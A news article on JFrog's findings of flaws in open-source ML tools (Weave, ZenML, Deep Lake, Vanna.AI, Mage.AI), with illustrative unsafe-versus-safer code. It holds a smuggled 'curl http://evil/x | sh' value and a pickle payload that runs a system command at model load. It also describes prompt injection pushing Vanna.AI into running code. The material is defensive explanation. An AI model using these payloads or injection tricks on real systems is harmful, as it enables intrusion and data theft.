Open source machine learning systems are highly vulnerable to security threats
- MLflow identified as most vulnerable open-source ML platform
- Directory traversal errors allow unauthorized access to files in Weave
- ZenML Cloud’s access control issues pose privilege escalation risks
A recent analysis of the security landscape of machine learning (ML) frameworks found that ML software is subject to more security vulnerabilities than more mature categories such as DevOps or web servers.
The growing adoption of machine learning across industries underscores the critical need to secure ML systems, as vulnerabilities can lead to unauthorized access, data breaches and compromised operations.
The report from JFrog claims that ML projects like MLflow have seen an increase in critical vulnerabilities. In recent months, JFrog has discovered 22 vulnerabilities in 15 open source ML projects. Of these vulnerabilities, two categories stand out: threats that target server-side components and privilege escalation risks within ML frameworks.
Critical vulnerabilities in ML frameworks
The vulnerabilities identified by JFrog affect key components commonly used in ML workflows. They allow attackers to exploit tools that ML practitioners often trust for their flexibility, gaining unauthorized access to sensitive files or elevated privileges within ML environments.
One of the highlighted vulnerabilities concerns Weave, a popular toolkit from Weights & Biases (W&B), which helps track and visualize ML model metrics. The WANDB Weave Directory Traversal vulnerability (CVE-2024-7340) allows low-privilege users to access arbitrary files in the file system.
This flaw occurs due to improper input validation when processing file paths, which could allow attackers to view sensitive files that could contain administrative API keys or other privileged information. Such a breach could lead to privilege escalation, giving attackers unauthorized access to resources and compromising the security of the entire ML pipeline.
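The report does not publish Weave's affected code, but the general failure mode behind a directory traversal like this is well understood: a user-supplied path is joined to a storage root without checking where it ends up. The sketch below is a generic, hypothetical illustration of that pattern (the names `ARTIFACT_ROOT`, `read_artifact_unsafe`, and `read_artifact_safe` are invented for this example, not taken from Weave).

```python
from pathlib import Path

ARTIFACT_ROOT = Path("/srv/ml/artifacts")  # hypothetical storage root

def read_artifact_unsafe(relative_path: str) -> bytes:
    # Vulnerable pattern: the user-supplied path is joined directly, so a
    # value like "../../etc/passwd" (or an absolute path) escapes the root
    # and can expose files such as API key stores or service configs.
    return (ARTIFACT_ROOT / relative_path).read_bytes()

def read_artifact_safe(relative_path: str) -> bytes:
    # Safer pattern: resolve the final path and verify it still sits
    # inside the intended root before reading anything.
    target = (ARTIFACT_ROOT / relative_path).resolve()
    if not target.is_relative_to(ARTIFACT_ROOT.resolve()):
        raise PermissionError("path escapes artifact root")
    return target.read_bytes()
```

The fix is conceptually small: validate the resolved path, not the raw string the client sent.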
ZenML, an MLOps pipeline management tool, is also affected by a critical vulnerability that compromises access control systems. This flaw allows attackers with minimal access to escalate their permissions within ZenML Cloud, a managed implementation of ZenML, giving them access to restricted information, including confidential secrets or model files.
The access control issue in ZenML exposes the system to significant risk as escalated privileges could allow an attacker to manipulate ML pipelines, tamper with model data, or access sensitive operational data, potentially impacting production environments that depend on these pipelines.
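JFrog's write-up does not detail ZenML Cloud's internal authorization logic, but a common way this class of privilege escalation arises is when a permission check trusts data supplied in the request rather than the role stored server-side for the authenticated user. The following sketch is purely illustrative and hypothetical; none of the names come from ZenML.

```python
from dataclasses import dataclass

@dataclass
class User:
    name: str
    role: str  # server-side record, e.g. "viewer" or "admin"

def store_secret(secret_id: str, value: str) -> None:
    # Placeholder backend write, for illustration only.
    print(f"stored {secret_id}")

def update_secret_unsafe(user: User, claimed_role: str, secret_id: str, value: str) -> None:
    # Vulnerable pattern: trusting a role claimed in the request body.
    # A low-privilege caller simply sends claimed_role="admin".
    if claimed_role != "admin":
        raise PermissionError("admin role required")
    store_secret(secret_id, value)

def update_secret_safe(user: User, secret_id: str, value: str) -> None:
    # Safer pattern: the check uses the server-side record of the caller.
    if user.role != "admin":
        raise PermissionError("admin role required")
    store_secret(secret_id, value)
```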
Another serious vulnerability, known as the Deep Lake Command Injection (CVE-2024-6507), was found in the Deep Lake database – a data storage solution optimized for AI applications. This vulnerability allows attackers to execute arbitrary commands by abusing the way Deep Lake handles importing external datasets.
Due to improper command sanitization, an attacker could potentially execute code remotely, compromising the security of both the database and any connected applications.
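As a generic illustration of that class of bug (not Deep Lake's actual implementation), the danger appears whenever an untrusted source string is interpolated into a shell command during an import. The command name `fetch-tool` and both function names below are hypothetical.

```python
import subprocess

def import_dataset_unsafe(source: str) -> None:
    # Vulnerable pattern: the untrusted source is placed into a shell
    # command line, so a value like "data.csv; curl http://evil/x | sh"
    # runs attacker-controlled commands on the host.
    subprocess.run(f"fetch-tool {source}", shell=True, check=True)

def import_dataset_safe(source: str) -> None:
    # Safer pattern: pass arguments as a list so nothing is interpreted
    # by a shell, and reject obviously suspicious input up front.
    if any(ch in source for ch in ";&|`$\n"):
        raise ValueError("unexpected characters in dataset source")
    subprocess.run(["fetch-tool", source], check=True)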
A notable vulnerability was also found in Vanna AI, a tool for generating and visualizing SQL queries from natural language. The Vanna.AI Prompt Injection (CVE-2024-5565) allows attackers to inject malicious code into SQL prompts, which the tool then processes. This vulnerability, which could lead to remote code execution, allows malicious actors to target Vanna AI’s SQL-to-Graph visualization feature to manipulate visualizations, perform SQL injections, or exfiltrate data.
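The underlying risk in prompt-injection-to-code-execution chains like this is executing whatever code a language model emits in response to user input. The snippet below is a generic sketch of that pattern, not Vanna.AI's actual code; the function name and payload string are invented for illustration.

```python
def run_generated_visualization(generated_code: str) -> None:
    # Vulnerable pattern: executing code that an LLM produced from a user
    # prompt. A prompt-injection payload can steer the model into emitting
    # arbitrary Python, which then runs with the tool's privileges.
    exec(generated_code)

# Illustrative malicious model output: a benign-looking charting request
# can smuggle a system command into the generated code.
malicious_output = "print('drawing chart'); __import__('os').system('id')"
run_generated_visualization(malicious_output)
```

Mitigations generally involve sandboxing the generated code or avoiding direct execution of model output altogether.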
Mage.AI, an MLOps tool for managing data pipelines, was found to have multiple vulnerabilities, including unauthorized shell access, arbitrary file leaks, and weak path checks.
These issues allow attackers to gain control of data pipelines, expose sensitive configurations, or even execute malicious commands. The combination of these vulnerabilities poses a high risk of privilege escalation and data integrity breaches, compromising the security and stability of ML pipelines.
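Weak path checks differ from the missing validation shown earlier: a check exists, but it compares raw strings instead of resolved paths. The sketch below is a hypothetical illustration of that failure mode, not Mage.AI's code.

```python
import os

UPLOAD_ROOT = "/srv/pipelines/uploads"  # hypothetical upload directory

def open_upload_weak(user_path: str):
    # Weak check: a prefix comparison on the raw string is bypassed by
    # "/srv/pipelines/uploads/../../../etc/passwd", which starts with the
    # prefix but resolves to a file outside the upload directory.
    if not user_path.startswith(UPLOAD_ROOT):
        raise PermissionError("outside upload root")
    return open(user_path, "rb")

def open_upload_stricter(user_path: str):
    # Stricter check: normalize first, then compare against the real root.
    resolved = os.path.realpath(user_path)
    root = os.path.realpath(UPLOAD_ROOT)
    if os.path.commonpath([resolved, root]) != root:
        raise PermissionError("outside upload root")
    return open(resolved, "rb")
```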
By gaining administrative access to ML databases or registries, attackers can embed malicious code into models, leading to backdoors that are activated when the model is loaded. This can compromise downstream processes as the models are used by different teams and CI/CD pipelines. The attackers can also exfiltrate sensitive data or perform model poisoning attacks to degrade model performance or manipulate output.
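Many ML artifacts are still distributed as Python pickle files, which makes the "backdoor activated on load" scenario straightforward: pickle runs code during deserialization, so merely loading a poisoned model is enough. The example below is a standard demonstration of that mechanism, not tied to any specific project named in the report.

```python
import pickle

class BackdooredModel:
    # pickle calls __reduce__ when deserializing, so loading the file is
    # enough to run attacker-chosen code; no inference call is needed.
    def __reduce__(self):
        import os
        return (os.system, ("echo 'payload runs at model load time'",))

# Attacker side: serialize the poisoned object into a "model" artifact
# and plant it in a registry or shared storage.
with open("model.pkl", "wb") as f:
    pickle.dump(BackdooredModel(), f)

# Victim side: a routine load in a notebook or CI/CD job triggers the payload.
with open("model.pkl", "rb") as f:
    pickle.load(f)
```

This is why untrusted model files should be treated like untrusted code, and why safer serialization formats and artifact signing are commonly recommended.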
JFrog’s findings highlight an operational gap in MLOps security. Many organizations lack robust integration of AI/ML security practices with broader cybersecurity strategies, creating potential blind spots. As ML and AI continue to drive significant advancements in the industry, protecting the frameworks, datasets, and models that fuel these innovations becomes paramount.